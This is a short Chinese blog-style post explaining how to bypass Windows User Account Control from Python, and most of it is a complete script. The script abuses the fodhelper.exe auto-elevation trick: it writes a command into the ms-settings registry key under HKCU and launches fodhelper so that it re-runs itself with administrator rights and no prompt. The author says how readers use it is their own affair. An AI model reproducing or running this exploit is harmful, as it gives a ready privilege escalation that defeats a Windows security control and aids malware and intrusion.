python如何轻松绕过UAC

很多时候我们不希望我们的软件弹出UAC提示，这个时候我们可以通过注册表的方法去解决。这其实已经不在是一个安全的编程了，它变成了一把双刃剑。

当然我们只是讨论这种问题该怎么解决。具体用在什么方面那是你的问题咯！

通过下面的代码我们可以轻松绕过UAC：

# -*- coding： utf-8 -*-

“”“

Created on Mon Jan 8 09:09:51 2018

@author： coordinate

”“”

from __future__ import print_function

import os

import sys

import ctypes

if sys.version_info［0］ == 3：

import winreg as winreg

else：

import _winreg as winreg

CMD = r“C：\Windows\System32\cmd.exe”

FOD_HELPER = r‘C：\Windows\System32\fodhelper.exe’

PYTHON_CMD = “python”

REG_PATH = ‘Software\Classes\ms-settings\shell\open\command’

DELEGATE_EXEC_REG_KEY = ‘DelegateExecute’

def is_admin（）：

‘’‘

Checks if the script is running with administrative privileges.

Returns True if is running as admin， False otherwise.

’‘’

try：

return ctypes.windll.shell32.IsUserAnAdmin（）

except：

return False

def create_reg_key（key， value）：

‘’‘

Creates a reg key

’‘’

try：

winreg.CreateKey（winreg.HKEY_CURRENT_USER， REG_PATH）

registry_key = winreg.OpenKey（winreg.HKEY_CURRENT_USER， REG_PATH， 0， winreg.KEY_WRITE）

winreg.SetValueEx（registry_key， key， 0， winreg.REG_SZ， value）

winreg.CloseKey（registry_key）

except WindowsError：

raise

def bypass_uac（cmd）：

‘’‘

Tries to bypass the UAC

’‘’

try：

create_reg_key（DELEGATE_EXEC_REG_KEY， ‘’）

create_reg_key（None， cmd）

except WindowsError：

raise

def execute（）：

if not is_admin（）：

print（‘［！］ The script is NOT running with administrative privileges’）

print（‘［+］ Trying to bypass the UAC’）

try：

current_dir = __file__

cmd = ‘{} /k {} {}’.format（CMD， PYTHON_CMD， current_dir）

bypass_uac（cmd）

os.system（FOD_HELPER）

sys.exit（0）

except WindowsError：

sys.exit（1）

else：

#这里添加我们需要管理员权限的代码

print（‘［+］ The script is running with administrative privileges！’）

if __name__ == ‘__main__’：

execute（）

---------------------

其实我们这个代码这里主要是往注册表中添加了这两项